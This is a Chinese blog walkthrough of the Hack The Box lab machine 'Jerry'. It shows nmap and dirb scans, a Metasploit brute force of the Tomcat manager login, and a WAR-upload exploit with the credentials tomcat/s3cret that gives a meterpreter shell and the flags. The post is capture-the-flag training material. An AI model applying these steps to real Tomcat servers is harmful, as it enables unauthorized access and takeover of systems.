Hackthebox------Jerry

最新推荐文章于 2024-05-28 10:25:19 发布
最新推荐文章于 2024-05-28 10:25:19 发布
阅读量3k 收藏 8
点赞数
分类专栏: 经验心得 HTB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/84452283
版权

hackthebox网站:https://www.hackthebox.eu

 

这次我们的靶机叫-Jerry

IP:10.10.10.95

 

======================================================================================

1.先用nmap对 目标靶机进行扫描

nmap -sC -sV  10.10.10.95

我们可以看到目标机器就只开启了 8080端口,那么我们用浏览器打开看看

 

然后我检查了这个页面,但是没有管理的账号和密码,也做不了什么。

 

我们扫一下目录试试看

drib http://10.10.10.95 /usr/share/wordlists/dirb/big.txt

也扫描不到任何有价值的东西

 

我们打开msfconsole

然后搜索关于tomcat的攻击脚本

然后我们  use /auxiliary/scanner/http/tomcat_mgr_login

然后我们配置下参数

set RHOSTS 10.10.10.95

SET RHPORT 8080 

设置完成之后就运行

 

爆破成功。

然后我们切换另一个攻击模块 

exploit/multi/http/tomcat_mgr_upload

然后分别设置下参数

set RHOST 10.10.10.95

set RPORT 8080

set Httpusername tomcat

set Httppassword:s3cret

然后开始攻击,就能建立会话

meterpreter命令查询:http://www.cnblogs.com/backlion/p/9484949.html

 

我们切换到桌面上看看,桌面上有什么东西

 

然后cd flags,再ls下看看内容

 

获取下这个文件内容

注意因为文件名有空格所以需要用双引号包起来。

大方子
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Location-cleaned iOS14.8驱动
02-15
在压缩包子文件的文件名称列表中,"location-clean 14.8 驱动 for jerry"可能表示这是为Jerry(可能是一个开发者的名字,或者是一个特定设备或用户群体的代号)准备的,专门针对iOS 14.8的定位服务清理驱动程序。...
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6531
Hack The Box,一款有意思的渗透测试平台
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3367
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
HackTheBox-Machines--Lame
最新发布
七天
05-28 318
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1788
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
mybatis-plus-3.0.zip
12-19
wrapper.eq(User::getName, "Jerry"); List<User> users = userMapper.selectList(wrapper); ``` 6. **最佳实践** - 使用MyBatis-Plus时,应尽可能避免直接编写原始SQL,以保持代码的可维护性和可扩展性。 - ...
selenium-java 3.4
08-16
包含selenium-server-standalone-3.4.0.jar,geckodriver.exe(64&32;),IEDriverServer.exe(64&32;),selenium-java-3.4.0,chromedriver_win32。兼容firefox54版本
yapi插件cross-request.zip
08-12
在现代Web开发中,跨域请求(CORS)是一个常见的需求,尤其是在进行API接口测试和接口管理时。YApi,作为一款强大的API管理平台,为开发者提供了一个高效、易用的接口文档管理和测试工具。... 一、理解Cross-Request...
apache-activemq5.15.3和5.15.5.zip
10-30
Apache ActiveMQ是世界上最流行的开源消息代理,它是一个强大的中间件,用于处理企业级的消息传递。在本文中,我们将深入探讨ActiveMQ的5.15.3和5.15.5版本,这两个版本都是该软件的重要里程碑。...
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1984
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 4107
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
连接Hack The Box靶场教程
Atopos545的博客
01-24 1014
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
HackTheBox 如何使用
网络安全学习
04-14 4636
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
hack the box 注册时全名无效、reCapcha validation等注册问题
weixin_68177269的博客
03-12 4031
本篇文章主要记述了在注册hack the box时候遇到的问题及其解决办法。同样可以应用在注册其他外网的情况下。
hackthebox注册教程
shy的博客
02-01 1万+
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www....
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 633
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
el-table-v2
05-25
<el-table-column prop="name" label="Name" :filters="[{text: 'Tom', value: 'Tom'}, {text: 'Jerry', value: 'Jerry'}]" :filter-method="nameFilter"></el-table-column> <el-table-column prop="age" label=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值